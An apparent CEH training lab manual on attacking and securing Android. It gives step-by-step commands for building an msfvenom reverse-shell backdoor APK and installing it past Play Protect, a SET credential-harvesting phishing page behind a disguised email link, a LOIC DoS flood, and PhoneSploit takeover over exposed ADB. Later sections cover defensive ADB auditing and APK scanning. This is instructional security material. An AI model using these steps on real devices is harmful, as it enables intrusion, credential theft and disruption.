Ceh11 Lab 17 Hacking Mobile Platforms Workbook

Uploaded by

deneme
CEH Lab Manual

Hacking Mobile Platforms
Module 17

Ethical Hacking and Countermeasures. Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Tools demonstrated in this lab are available in E:\CEH-Tools\CEHv11 Module 17 Hacking Mobile Platforms.

Hacking Mobile Platforms

Mobile devices allow communication between users on radio frequencies, whether GSM, LTE, 5G, or Wi-Fi. They can be used to send multimedia content, email, and perform many more tasks using the Internet.

Lab Scenario

With the advancement of mobile technology, mobility has become a key feature of Internet usage. People's lifestyles are becoming increasingly reliant on smartphones and tablets. Mobile devices are replacing desktops and laptops, as they enable users to access email, the Internet, and GPS navigation, and to store critical data such as contact lists, passwords, calendars, and login credentials. In addition, recent developments in mobile commerce have enabled users to perform transactions on their smartphones such as purchasing goods and applications over wireless networks, redeeming coupons and tickets, and banking.

Most mobile devices come with options to send and receive text or email messages, as well as download applications via the Internet. Although these functions are technological advances, hackers continue to use them for malicious purposes. For example, they may send malformed APKs (application package files) or URLs to individuals to entice victims to click on or even install them, and so grant the attackers access to users' login credentials, or whole or partial control of their devices.

Mobile security is becoming more challenging with the emergence of complex attacks that utilize multiple attack vectors to compromise mobile devices. These security threats can lead to critical data, money, and other information being stolen from mobile users and may also damage the reputation of mobile networks and organizations. The belief that surfing the Internet on mobile devices is safe causes many users to not enable their devices' security software. The popularity of smartphones and their moderately lax security have made them attractive and more valuable targets to attackers.

As an expert ethical hacker or penetration tester, you should first test the mobile platform used by your organization for various vulnerabilities; then, using this information, you should secure it from possible attacks.

In this lab, you will obtain hands-on experience with various techniques of launching attacks on mobile platforms, which will help you to audit their security.

Lab Objectives

The objective of the lab is to carry out mobile platform hacking and other tasks that include, but are not limited to:

* Exploit the vulnerabilities in an Android device
* Obtain users' credentials
* Hack Android device with a malicious application
* Use an Android device to launch a DoS attack on a target
* Exploit an Android device through ADB
* Perform a security assessment on an Android device

Lab Environment

To carry out this lab, you need:

* Windows 10 virtual machine
* Parrot Security virtual machine
* Android emulator running on a virtual machine
* Web browsers with an Internet connection
* Administrator privileges to run the tools

Lab Duration

Time: 90 Minutes

Overview of Hacking Mobile Platforms

At present, smartphones are widely used for both business and personal purposes.
Thus, they are a treasure trove for attackers looking to steal corporate or personal data. Security threats to mobile devices have increased with the growth of Internet connectivity, use of business and other applications, various methods of communication available, etc. Apart from certain security threats that are specific to them, mobile devices are also susceptible to many other threats that are applicable to desktop and laptop computers, web applications, and networks.

Nowadays, smartphones offer broad Internet and network connectivity via varying channels such as 3G/4G/5G, Bluetooth, Wi-Fi, or wired computer connections. Security threats may arise while transmitting data at different points along these various paths.

Lab Tasks

Ethical hackers or penetration testers use numerous tools and techniques to attack target mobile devices. The recommended labs that will assist you in learning various mobile attack techniques include:

1 Hack Android Devices
  1.1 Hack an Android Device by Creating Binary Payloads using Parrot Security
  1.2 Harvest Users' Credentials using the Social-Engineer Toolkit
  1.3 Launch a DoS Attack on a Target Machine using Low Orbital Cannon (LOIC) on the Android Mobile Platform
  1.4 Exploit the Android Platform through ADB using PhoneSploit
2 Secure Android Devices using Various Android Security Tools
  2.1 Analyze a Malicious App using Online Android Analyzers
  2.2 Analyze a Malicious App using Quixxi Vulnerability Scanner
  2.3 Secure Android Devices from Malicious Apps using Malwarebytes Security

Remark

EC-Council has prepared a considerable amount of lab exercises for students to practice during the 5-day class and at their free time to enhance their knowledge and skill.

* Core - Lab exercise(s) marked under Core are recommended by EC-Council to be practised during the 5-day class.
* Self-study - Lab exercise(s) marked under Self-study are for students to practise at their free time. Steps to access the additional lab exercises can be found in the first page of CEHv11 volume 1 book.
* iLabs - Lab exercise(s) marked under iLabs are available in our iLabs solution. iLabs is a cloud-based virtual lab environment preconfigured with vulnerabilities, exploits, tools, and scripts, and can be accessed from anywhere with an Internet connection. If you are interested to learn more about our iLabs solution, please contact your training center or visit https://ilabs.eccouncil.org.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Hack Android Devices

Attackers use various Android hacking tools to identify vulnerabilities and exploit target mobile devices in order to obtain critical user information such as credentials, personal information, contact lists, etc.

Lab Scenario

The number of people using smartphones and tablets is on the rise, as these devices support a wide range of functionalities. Android is the most popular mobile OS, because it is a platform open to all applications. Like other OSes, Android has its vulnerabilities, and not all Android users install patches to keep OS software and apps up to date and secure.
This casualness enables attackers to exploit vulnerabilities and launch various types of attacks to steal valuable data stored on the victims' devices.

Owing to the extensive usage and implementation of bring your own device (BYOD) policies in organizations, mobile devices have become a prime target for attacks. Attackers scan these devices for vulnerabilities. These attacks can involve the device and the network layer, the data center, or a combination of these.

As a professional ethical hacker or pen tester, you should be familiar with all the hacking tools, exploits, and payloads to perform various tests on mobile devices connected to a network to assess its security infrastructure.

In this lab, we will use various tools and techniques to hack the target mobile device.

Lab Objectives

* Hack an Android device by creating binary payloads using Parrot Security
* Harvest users' credentials using the Social-Engineer Toolkit
* Launch a DoS attack on a target machine using Low Orbital Cannon (LOIC) on the Android mobile platform
* Exploit the Android platform through ADB using PhoneSploit

Lab Environment

To carry out this lab, you need:

* Windows 10 virtual machine
* Parrot Security virtual machine
* Android emulator running on a virtual machine
* Web browsers with an Internet connection
* Administrator privileges to run the tools
* LOIC located at E:\CEH-Tools\CEHv11 Module 17 Hacking Mobile Platforms\Android Hacking Tools\Low Orbit Ion Cannon (LOIC)
* You can also download the latest version of LOIC from its official website. If you do so, the screenshots in this lab manual might differ from the images that you see on your screen in the lab.

Lab Duration

Time: 60 Minutes

Overview of Hacking Android Platforms

Android is a software environment developed by Google for mobile devices. It includes an OS, a middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java API Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer [HAL], and Linux kernel) and five layers.

Owing to the increase in the number of users with Android devices, they have become the primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spearphone attacks.

Lab Tasks

Task 1: Hack an Android Device by Creating Binary Payloads using Parrot Security

Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target system to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code.

In this task, we will use Metasploit to create a binary payload in Parrot Security to hack an Android device.

1. Turn on the Parrot Security and Android virtual machines.
Note: You need to navigate to the Android virtual machine regularly as it freezes if left idle.
2. Switch to the Parrot Security virtual machine. In the login page, the attacker username will be selected by default. Enter password as toor in the Password field and press Enter to log in to the machine.
Note: If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it. If a Question pop-up window appears asking you to update the machine, click No to close the window.
3. Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
4. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
5. In the [sudo] password for attacker field, type toor as a password and press Enter.
Note: The password that you type will not be visible.
6. Now, type cd and press Enter to jump to the root directory.
7. In the Parrot Terminal window, type service postgresql start and press Enter to start the database service.
8. Type msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk and press Enter to generate a backdoor, or reverse meterpreter application.
Note: This command creates an APK (Backdoor.apk) on Desktop under the Root directory. In this case, 10.10.10.13 is the IP address of the Parrot Security virtual machine. This IP address may differ in your lab environment.
Figure 1.1.4: Setting the Android payload and creating a backdoor
9. Now, share or send the Backdoor.apk file to the victim machine (in this lab, we are using the Android emulator as the victim machine).
Note: In this task, we are sending the malicious payload through a shared directory, but in real-life cases, attackers may send it via an attachment in an email, over Bluetooth, or through some other application or means.
10. Type cp /root/Desktop/Backdoor.apk /var/www/html/share/ and press Enter to copy the file to the share folder.
Note: If the shared folder is not present, navigate to /var/www/html and create a folder named share.
11. Now, type service apache2 start and press Enter to start the Apache web server.
Figure 1.1.5: Copying the backdoor file to the share folder
12. Type msfconsole and press Enter to launch the Metasploit framework.
13. In msfconsole, type use exploit/multi/handler and press Enter.
14. Now, issue the following commands in msfconsole:
* Type set payload android/meterpreter/reverse_tcp and press Enter.
* Type set LHOST 10.10.10.13 and press Enter.
* Type show options and press Enter. This command lets you know the listening port (in this case, 4444), as shown in the screenshot.
Figure 1.1.7: Setting the payload and local host
15. Type exploit -j -z and press Enter. This command runs the exploit as a background job.
Figure 1.1.8: Starting the exploit
16. Switch to the Android emulator virtual machine.
17. In the Android Emulator GUI, click the Chrome icon on the lower section of the Home Screen to launch the browser.
18. In the address bar, type http://10.10.10.13/share and press Enter.
Note: If a pop-up appears, click Allow.
19. The Index of /share page appears; click Backdoor.apk to download the application package file.
Note: If a warning message appears at the lower section of the browser window, click OK.
Note: If Chrome needs storage access to download files, a pop-up will appear; click Continue. If any pop-up appears stating that the file contains a virus, ignore the message and download the file anyway.
20. After the download finishes, a notification appears at the bottom of the browser window. Click Open to open the application.
Figure 1.1.11: Open the downloaded Backdoor.apk
21. A MainActivity screen appears; click Next, and then Install.
Figure 1.1.12: MainActivity screen
22. A Blocked by Play Protect pop-up appears; click INSTALL ANYWAY.
Figure 1.1.13: Blocked by Play Protect pop-up
23. A Send app for scanning? pop-up appears;
Figure 1.1.14: Send app for scanning
24. After the application installs successfully, an App installed notification appears; click OPEN.
Figure 1.1.15: App installed notification
25. Switch back to the Parrot Security virtual machine. The meterpreter session has been opened successfully, as shown in the screenshot.
Note: In this case, 10.10.10.14 is the IP address of the victim machine (Android Emulator). The IP addresses may vary in your lab environment.
Figure 1.1.16: Meterpreter session launched
Type sessions -i 1 and press Enter. The Meterpreter shell is launched as shown in the screenshot.
Note: In this command, 1 specifies the number of the session.
26. Type sysinfo and press Enter. Issuing this command displays the information of the target machine such as computer name, OS, etc.
27. Type ipconfig and press Enter to display the victim machine's network interfaces, IP address (IPv4 and IPv6), MAC address, etc. as shown in the screenshot.
28. Type pwd and press Enter to view the current or present working directory on the remote (target) machine.
29. Type cd /sdcard to change the current remote directory to sdcard.
Note: The cd command changes the current remote directory.
30. Now, type pwd and press Enter. You will observe that the present working directory has changed to sdcard, that is, /storage/emulated/0.
Figure 1.1.21: Changing the PWD to sdcard
31. Now, still in the Meterpreter session, type ps and press Enter to view the processes running in the target system.
Note: The list of running processes might differ in your lab environment.
Note: Because of poor security settings and a lack of awareness, if an individual in an organization installs a backdoor file on their device, the attacker gains control of the device. The attacker can then perform malicious activities such as uploading worms, downloading data, and spying on the user's keystrokes, which can reveal sensitive information related to the organization as well as the victim.
32. This concludes the demonstration of how to hack an Android device by creating binary payloads using Parrot Security.
33. Close all open windows and document all the acquired information.
34. Turn off the Parrot Security and Android virtual machines.

Task 2: Harvest Users' Credentials using the Social-Engineer Toolkit

The Social-Engineer Toolkit (SET) is an open-source, Python-driven tool that enables penetration testing via social engineering. SET categorizes attacks according to the attack vector used, such as email, web, or USB. The toolkit attacks human weakness, exploiting traits such as people's trust and fear.

In this task, we will sniff Facebook credentials on the Android platform using SET.

1. Turn on the Parrot Security and Android virtual machines.
2. Log in to the Parrot Security virtual machine.
3. Click Applications in the top-left corner of Desktop and navigate to Pentesting -> Exploitation Tools -> Social Engineering -> social engineering toolkit.
4. A Terminal window appears; in the [sudo] password for attacker field, type toor and press Enter.
Note: The password that you type will not be visible.
5. Type y and press Enter to agree to the terms of service.
6. The SET menu appears, as shown in the screenshot. Type 1 and press Enter to choose Social-Engineering Attacks.
7. A list of options for Social-Engineering Attacks appears; type 2 and press Enter to choose Website Attack Vectors.
8. A list of Website Attack Vector options appears; type 3 and press Enter to choose Credential Harvester Attack Method.
9. Now, we need to create a clone of the Facebook login page. Type 2 and press Enter to choose Site Cloner from the menu.
10. Type the IP address of the local machine (Parrot Security) in the prompt for "IP address for the POST back in Harvester/Tabnabbing" and press Enter.
Note: The IP address of Parrot Security in this case is 10.10.10.13, but this may vary in your lab environment.
11. Now, you will be prompted for a URL to be cloned; type the desired URL in "Enter the url to clone" and press Enter. In this example, we are cloning the URL http://certifiedhacker.com/Online%20Booking/index.htm.
Note: You can clone any URL of your choice.
Figure 1.2.5: Providing the URL to be cloned
12. If a Press {return} if you understand what we're saying here message appears, press Enter.
Note: If a message appears asking Do you want to attempt to disable Apache?, type y and press Enter.
13. After cloning is completed, the highlighted message appears and the credential harvester initiates, as shown in the screenshot.
14. Now, you must send the IP address of your Parrot Security virtual machine to a victim and trick them to click on it. Minimize the Terminal window.
15. Remaining on your Parrot Security virtual machine, click on the Firefox icon in the top section of Desktop to launch the Firefox web browser.
16. In the Firefox browser window, open your email account (in this example, Gmail) and log in.
Note: You can use any email account of your choice.
17. After logging into your email account, click the Compose button and craft a fake email that will lure a user into opening and clicking on a malicious link.
Note: We will disguise the malicious link behind a fake link that looks safe to click.
18. Having written an enticing message in the body of the email, move the cursor to where you wish to place the malicious link. Then, click the Insert link icon.
Figure 1.2.7: Linking the fake URL to the malicious URL
19. In the Edit Link window, first type the actual address of your cloned site (the actual, malicious IP address) in the Web address field under the Link to section. Then, type the fake URL in the Text to display field. In this case, the actual address of our cloned certifiedhacker site is http://10.10.10.13, and the text that will be displayed in the message is http://www.bookhotel.com/change_account_password; click OK.
Figure 1.2.8: Edit Link window
20. The fake URL should now appear in the message body, as shown in the screenshot.
21. To verify that the fake URL is linked to the real one, click the fake URL; it will display the actual URL as "Go to link." Once verified, send the email to the intended user.
Figure 1.2.9: Actual URL linked to fake URL
22. Switch to the Android virtual machine.
Note: Restart the Android virtual machine if it is not responding.
23. Click the Chrome icon on the Home screen to launch the browser.
24. In the Google Chrome browser window, sign in to the account to which you sent the phishing mail as an attacker. Open the email you sent previously and click to open the malicious link.
Note: We are opening the phishing mail as a victim.
Figure 1.2.10: The phishing mail
25. When the victim (in this case, you) clicks the URL, a new tab opens up, and a replica of www.certifiedhacker.com loads.
26. The hotel booking page appears; scroll down to the end of the page. Here, the victim will be prompted to enter his/her username and password into the form fields, which appear as they do on the genuine website. When the victim enters the Username and Password and clicks Login, the page shows an error, as shown in the second screenshot.
Figure 1.2.11: Fake Online Booking login page
27. As soon as the victim types in their Username and Password and clicks Log In, SET, which is running in Parrot Security, fetches the typed credentials, which can then be used by the attacker to gain unauthorized access to the victim's account.
28. Switch to the Parrot Security virtual machine. In the terminal window, scroll down to find a Username and Password, displayed in plain text, as shown in the screenshot.
29. This concludes the demonstration of how to phish user credentials using SET.
30. Close all open windows and document all the acquired information.
31. Turn off the Parrot Security and Android virtual machines.

Task 3: Launch a DoS Attack on a Target Machine using Low Orbital Cannon (LOIC) on the Android Mobile Platform

In this task, we will use LOIC on the Android mobile platform to launch a DoS attack on a target machine.

1. Turn on the Windows 10, Windows Server 2019, and Android virtual machines.
2. Switch to the Android virtual machine. On the Home screen, swipe from right to left to navigate to the second page of the Home screen.
Note: Restart the Android virtual machine if it is not responding.
Figure 1.3.1: Swipe to the second page of the Home screen
3. On the second page of the Home screen, click the Cx File Explorer app.
Note: LOIC is an open-source network stress testing and denial-of-service (DoS) attack application. LOIC performs a DoS attack (or, when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host.
Figure 1.3.2: Launch Cx File Explorer
4. Cx File Explorer opens; click 10.10.10.10 from the Network tab and navigate to CEH-Tools > CEHv11 Module 17 Hacking Mobile Platforms > Android Hacking Tools > Low Orbit Ion Cannon (LOIC).
Figure 1.3.3: Cx File Explorer
5. Click the Low Orbit Ion Cannon LOIC v1.3.apk file.
Figure 1.3.4: Open the LOIC APK
6. A Do you want to install this application? screen appears; click INSTALL.
Figure 1.3.5: Click Install
7. The installation begins; on completion, an App installed notification appears; click OPEN to launch the app.
Figure 1.3.6: Launching LOIC
8. On the LOIC screen, we will set a target website or machine. In this task, we shall launch a DoS attack on the Windows Server 2019 (10.10.10.19) machine.
9. In the left pane, in the URL field, type 10.10.10.19 and click the GET IP button.
10. The IP address of the target machine is displayed under the Manual IP option, as shown in the screenshot.
11. To launch the attack, first select the TCP radio button; in the right pane, enter 80 as the Port number and in the Threads field, enter 100. Then, click the Start button, as shown in the screenshot.
12. LOIC begins to flood the target machine with TCP packets, which we will see by running Wireshark.
13. Switch to the Windows Server 2019 virtual machine and log in with the credentials Administrator/Pa$$w0rd.
14. Click the Type here to search field at the bottom of Desktop and type wireshark. Then, click Wireshark from the results.
Note: If Wireshark is not installed in the Windows Server 2019 virtual machine, then navigate to the location Z:\CEHv11 Module 03 Scanning Networks\Banner Grabbing Tools\Wireshark, double-click the Wireshark-win64-3.0.5.exe file, and install Wireshark using default settings.
15. The Wireshark Network Analyzer opens; double-click on the primary network interface (in this case, Ethernet0) to start capturing network traffic.
Note: The network interface might differ in your lab environment.
Figure 1.3.9: Capturing network traffic using Wireshark
16. Wireshark starts capturing network packets. Note the huge number of packets coming from the attackers' machine (in this case, Android, which has the IP address 10.10.10.14), as shown in the screenshot.
17. The packets from 10.10.10.14 are sent to the target machine (Windows Server 2019), whose IP address is 10.10.10.19.
Figure 1.3.10: Wireshark displaying network traffic
18. Now, click the Stop capturing packets icon in the toolbar to stop the process.
19. Observe the huge number of packets sent in the Packets field at the bottom of the Wireshark window, as shown in screenshot.
Figure 1.3.11: Stop packet capture
20. Now switch back to the Android virtual machine and halt the DoS attack by clicking the STOP button.
21. This concludes the demonstration of how to use LOIC on Android to launch a DoS attack on a target machine.
22. Close all open windows and document all the acquired information.
23. Turn off the Windows 10, Windows Server 2019, and Android virtual machines.

Task 4: Exploit the Android Platform through ADB using PhoneSploit

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates device actions such as installing and debugging apps, and provides access to a Unix shell on the device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server over TCP on the device.

In this task, we will exploit the Android platform through ADB using the PhoneSploit tool.
Note: We will target the Android virtual machine (10.10.10.14) using the Parrot Security virtual machine.

1. Turn on the Parrot Security and Android virtual machines.
2. In the login page, the attacker username will be selected by default. Enter password as toor in the Password field and press Enter to log in to the machine.
Note: If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it. If a Question pop-up window appears asking you to update the machine, click No to close the window.
3. Click the MATE Terminal icon at the top of the Desktop window to open a Parrot Terminal window.
4. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
5. In the [sudo] password for attacker field, type toor as a password and press Enter.
Note: The password that you type will not be visible.
6.
Now, type cd and press Enter to jump to the root directory.
7. In the Terminal window, type apt-get install adb and press Enter to install ADB.
8. If a Do you want to continue? message appears during the installation, type Y and press Enter to continue.

Task 4.1: Clone PhoneSploit Repository

9. Once the installation completes, type git clone https://github.com/01010000-kumar/PhoneSploit and press Enter to clone the PhoneSploit repository.
Note: You can also access the tool repository from the CEH-Tools folder available in the Windows 10 virtual machine, in case the GitHub link does not exist, or you are unable to clone the tool repository. Follow the steps below in order to access the CEH-Tools folder from the Parrot Security virtual machine:
* Open any explorer window and press Ctrl+L. The Location field appears; type smb://10.10.10.10 and press Enter to access Windows 10 shared folders.
* The security pop-up appears; enter the Windows 10 virtual machine credentials (Username: Admin and Password: Pa$$w0rd) and click Connect.
* The Windows shares on 10.10.10.10 window appears; navigate to the location CEH-Tools/CEHv11 Module 17 Hacking Mobile Platforms/GitHub Tools/ and copy the PhoneSploit folder.
* Paste the copied PhoneSploit folder on the location /home/attacker/.
* In the terminal window, type mv /home/attacker/PhoneSploit /root/.
10. Now, type cd PhoneSploit and press Enter to navigate to the PhoneSploit folder.
Note: By default, the tool will be cloned in the root directory.
11. Type python3 -m pip install colorama and press Enter to install the dependency.
12. Now, type python3 phonesploit.py and press Enter to run the tool.
13. The PhoneSploit main menu options appear, as shown in the screenshot.

Task 4.2: Specify and Exploit the Target Android Device

14. The main_menu prompt appears; type 3 and press Enter to choose Connect a new phone.
15. When prompted to Enter a phones ip address, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
16. You will see that the target Android device (in this case, 10.10.10.14) is connected through port number 5555.
Note: If you are unable to establish a connection with the target device, then perform Steps #12-15 again.
17. Now, at the main_menu prompt, type 4 and press Enter to choose Access Shell on a phone.
18. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
19. You can observe that a shell command line appears, as shown in the screenshot.

Figure 1.4.7: Shell access on phone

20. In the shell command line, type pwd and press Enter to view the present working directory on the target Android device.
21. In the results, you can observe that the PWD is the root directory.
22. Now, type ls and press Enter to view all the files present in the root directory.
23. Type cd sdcard and press Enter to navigate to the sdcard folder.
24. Type ls and press Enter to list all the available files and folders.
Note: In this example, we will download an image file (images.jpeg) that we placed in the Android virtual machine's Download folder earlier; you can do the same before performing the next steps.
25.
Type cd Download and press Enter to navigate to the Download folder.
26. Type ls and press Enter to list all the available files in the folder. In this case we are interested in the images.jpeg file, which we downloaded earlier.
Note: Note down the location of images.jpeg (in this example, /sdcard/Download/images.jpeg). We will download this file in later steps.
27. Type exit and press Enter to exit the shell command line and return to the main menu.
28. At the main_menu prompt, type 7 and press Enter to choose Screen Shot a picture on a phone.
29. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
30. When prompted to Enter where you would like the screenshot to be saved, type /home/attacker/Desktop/ as the location and press Enter. The screenshot of the target mobile device will be saved in the given location. Minimize the Terminal window.
31. Click Places in the top section of the Desktop; then, from the context menu, click Desktop.
32. You should see the downloaded screenshot of the targeted Android device (screen.png). Double-click it if you wish to view the screenshot.
33. Close the Desktop window and switch back to the Terminal window.
34. At the main_menu prompt, type 14 and press Enter to choose List all apps on a phone.
35. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
36. The result appears, displaying the installed apps on the target Android device, as shown in the screenshot.
Note: Using this information, you can use other PhoneSploit options to either launch or uninstall any of the installed apps.
37. Now, at the main_menu prompt, type 15 and press Enter to choose Run an app. In this example, we will launch a calculator app on the target Android device.
Note: Based on the information obtained in the previous step about the installed applications, you can launch any app of your choice.
38. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
39. To launch the calculator app, type com.android.calculator2 and press Enter.
40. After launching the calculator app on the target Android device, switch to the Android virtual machine.
41. You will see that the calculator app is running, and that random values have been entered, as shown in the screenshot.
Note: The entered values might differ in your lab environment.
42. Switch back to the Parrot Security virtual machine. In the Terminal window, type p and press Enter to navigate to additional PhoneSploit options on the Next Page.
43. The result appears, displaying additional PhoneSploit options, as shown in the screenshot.
44. At the main_menu prompt, type 18 and press Enter to choose Show Mac/Inet information for the target Android device.
45. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
46. Now, at the main_menu prompt, type 21 and press Enter to choose the NetStat option.
47. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
48.
The result appears, displaying netstat information of the target Android device, as shown in the screenshot.
Note: For demonstration purposes, in this task, we are exploiting the Android emulator virtual machine. However, in real life, attackers use the Shodan search engine to find ADB-enabled devices and exploit them to gain sensitive information and carry out malicious activities.
49. In the same way, you can exploit the target Android device further by choosing other PhoneSploit options such as Install an apk on a phone, Screen record a phone, Turn The Device off, and Uninstall an app.
50. This concludes the demonstration of how to exploit the Android platform through ADB using PhoneSploit.
51. Document all the acquired information and close all open windows.
52. Turn off the Parrot Security and Android emulator virtual machines.

Lab Analysis

Analyze and document the results related to this lab exercise. Give your opinion about

Platform Supported: Classroom, iLabs

Secure Android Devices using Various Android Security Tools

Ethical hackers and penetration testers are aided in securing Android devices by various tools for assessing and enhancing their security features.

Lab Scenario

Like personal computers, mobile devices store sensitive data and are susceptible to various threats.
Therefore, they should be properly secured in order to prevent the compromise or loss of confidential data, lessen the risk of various threats such as viruses and Trojans, and mitigate other forms of abuse. Strict measures and security tools are vital to strengthening the security of these devices.

Android's growing popularity has led to increased security threats, ranging from typical malware to advanced phishing and identity theft techniques. As a professional ethical hacker or penetration tester, you should scan for any unsecured settings on the mobile device you are assessing, and then take appropriate action to secure them. You must do this before hackers exploit these vulnerabilities by, for example, downloading sensitive data, committing a crime using your Android device as a launchpad, and ultimately endangering your business.

There are various security tools available for scanning, detecting, and assessing the vulnerabilities and security status of Android devices. Many security software companies have launched their own apps, including several complete security suites with antitheft capabilities.

The tasks in this lab will assist you in performing a security assessment of a target Android device.

Lab Objectives

* Analyze a malicious app using online Android analyzers
* Analyze a malicious app using Quixxi vulnerability scanner
* Secure Android devices from malicious apps using Malwarebytes Security
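The Lab Scenario asks you to scan the device for unsecured settings, and the PhoneSploit task above depended on one: ADB reachable over TCP. The following is an added example, not part of the original lab manual, that audits the output of `adb shell getprop` from a device you are assessing for the properties that control that exposure; both property dumps and the function names are constructed for illustration.

```python
import re

# Constructed `adb shell getprop` excerpts (sample data, not captured from the lab).
EXPOSED_GETPROP = """\
[ro.build.type]: [userdebug]
[ro.debuggable]: [1]
[ro.secure]: [0]
[ro.adb.secure]: [0]
[service.adb.tcp.port]: [5555]
[persist.sys.usb.config]: [mtp,adb]
"""

HARDENED_GETPROP = """\
[ro.build.type]: [user]
[ro.debuggable]: [0]
[ro.secure]: [1]
[ro.adb.secure]: [1]
[service.adb.tcp.port]: [-1]
[persist.sys.usb.config]: [mtp]
"""

PROP_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]:\s*\[(?P<value>.*)\]$")


def parse_getprop(text):
    """Turn `[key]: [value]` lines into a dict, ignoring anything else."""
    props = {}
    for line in text.splitlines():
        match = PROP_LINE.match(line.strip())
        if match:
            props[match.group("key")] = match.group("value")
    return props


def audit_adb_exposure(props):
    """Return (severity, property, reason) tuples for settings that expose ADB."""
    findings = []
    # adbd listens on the network when either property holds a positive port.
    for key in ("service.adb.tcp.port", "persist.adb.tcp.port"):
        port = props.get(key, "")
        if port.isdigit() and int(port) > 0:
            findings.append(("high", key, f"adbd accepts TCP connections on port {port}"))
    if props.get("ro.adb.secure") == "0":
        findings.append(("high", "ro.adb.secure",
                         "hosts can connect without an authorized RSA key"))
    if props.get("ro.debuggable") == "1":
        findings.append(("medium", "ro.debuggable",
                         "debuggable build: adb root and app debugging are allowed"))
    if props.get("ro.secure") == "0":
        findings.append(("medium", "ro.secure",
                         "adbd keeps root privileges instead of dropping to shell"))
    if "adb" in props.get("persist.sys.usb.config", "").split(","):
        findings.append(("low", "persist.sys.usb.config", "USB debugging is enabled"))
    return findings


def network_exposed(findings):
    """True when a finding means ADB is reachable over the network."""
    return any(prop.endswith("adb.tcp.port") for _, prop, _ in findings)


if __name__ == "__main__":
    for label, text in (("exposed", EXPOSED_GETPROP), ("hardened", HARDENED_GETPROP)):
        results = audit_adb_exposure(parse_getprop(text))
        print(label, "network exposed:", network_exposed(results))
        for severity, prop, reason in results:
            print(f"  [{severity}] {prop}: {reason}")
```

A device that reports a network finding should have wireless debugging switched off and USB debugging disabled when it is not needed for development.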
Tools demonstrated in this lab are available in E:\CEH-Tools\CEHv11 Module 17 Hacking Mobile Platforms

Lab Environment

To carry out this lab, you need:
* Windows 10 virtual machine
* Parrot Security virtual machine
* Android emulator running on a virtual machine
* Web browsers with an Internet connection
* Administrator privileges to run the tools

Lab Duration

Time: 30 Minutes

Overview of Android Security Tools

Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization's mobile platforms. These tools automate the process of accurate Android platform security assessment.

Lab Tasks

Task 1: Analyze a Malicious App using Online Android Analyzers

Task 1.1: Analyze APK File using Sixo Online APK Analyzer

In this task, we will analyze a malicious app using various online Android analyzers.
Note: In this lab, we will be analyzing the malicious file (Backdoor.apk), which we used in the previous lab to hack the target Android platform.
Note: If the malicious file (Backdoor.apk) is missing, then follow the steps given in Lab 1 Task 1 (Hack an Android Device by Creating Binary Payloads using Parrot Security) to re-create the file.

1. Turn on the Android virtual machine and click the Google Chrome browser icon on the Home screen to launch Chrome.
2. In Chrome, type https://www.sisik.eu/apk-tool in the address bar and press Enter.
3. The Sixo Online APK Analyzer webpage loads, as shown in the screenshot.
Note: If a cookie notification pop-up appears, click Got it!
4. Click the Drop APK here or click to select file field to upload an APK file from the device.
Note: Sixo Online APK Analyzer allows you to analyze various details about Android APK files. It can decompile binary XML files and resources.
5. In the Choose an action pop-up, click Files.
6. The Downloads screen appears; double-click the app_backdoored.apk file.
Note: If you find yourself in a folder called Recent, navigate to the Downloads folder by clicking on the hamburger icon in the top-left corner.
7. The browser window reappears with the information about the uploaded file (Backdoored.apk), as shown in the screenshot.
8. Scroll down to the Requested Permissions section to view information regarding the app's requested permissions.
Note: When an app wants to access resources or various device capabilities, it typically must request permission from the user to do so. Some permissions are granted by the user when installing the app and some need to be confirmed later while the app is running. The requested permissions are declared in the app's AndroidManifest.xml.
9. Scroll down to the AndroidManifest.xml section, which consists of essential information about the APK file.
Note: The manifest file contains important information about the app that is used by development tools, the Android system, and app stores.
It contains the app's package name, version information, declarations of app components, requested permissions, and other important data. It is serialized into a binary XML format and bundled inside the app's APK file.
10. You can also scroll down to view information about the app's APK Signature, App Source Code, etc.
11. Now, we shall analyze the malicious app using the tool AVC UnDroid.
12. Press Ctrl+T to open a new tab, type https://undroid.av-comparatives.org/ in the address bar, and press Enter.
13. The AVC UnDroid website loads; click Select APK...
14. In the Choose an action pop-up, click Files.
15. In the Downloads screen, double-click app_backdoored.apk.
16. The selected file (app_backdoored.apk) is now listed; click the Start analysis button to analyze the selected APK file.
Note: AVC UnDroid is an online Android analyzer that provides static analysis of Android apps.
17. AVC UnDroid initializes the analysis of the selected APK file. On completion, the Report appears, displaying detailed information about the APK file, as shown in the screenshot.
